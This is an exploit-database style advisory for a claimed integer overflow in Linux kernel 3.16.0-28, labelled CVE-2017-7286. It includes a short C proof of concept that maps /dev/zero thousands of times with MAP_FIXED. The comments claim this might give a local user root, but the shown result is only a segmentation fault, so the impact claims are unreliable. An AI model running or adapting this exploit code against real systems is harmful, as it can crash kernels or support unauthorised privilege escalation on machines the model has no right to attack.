[+] Title: Linux kernel 3.16.0-28 - Integer overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-7286
 
Vendor:
===============
 
https://www.kernel.org/
  
  
Vulnerability Type:
===================
 
"inode" Integer overflow
 
 
Exploit:
===================
// INODE can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access.
// gcc buffer.c -o buffer
// $ ./buffer   
// Segmentation Fault 


#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}


 
CVE Reference:
===============
 
CVE-2017-7286
  
  
Tested on:
===============
 
Linux ubuntu 3.16.0-28 x86_64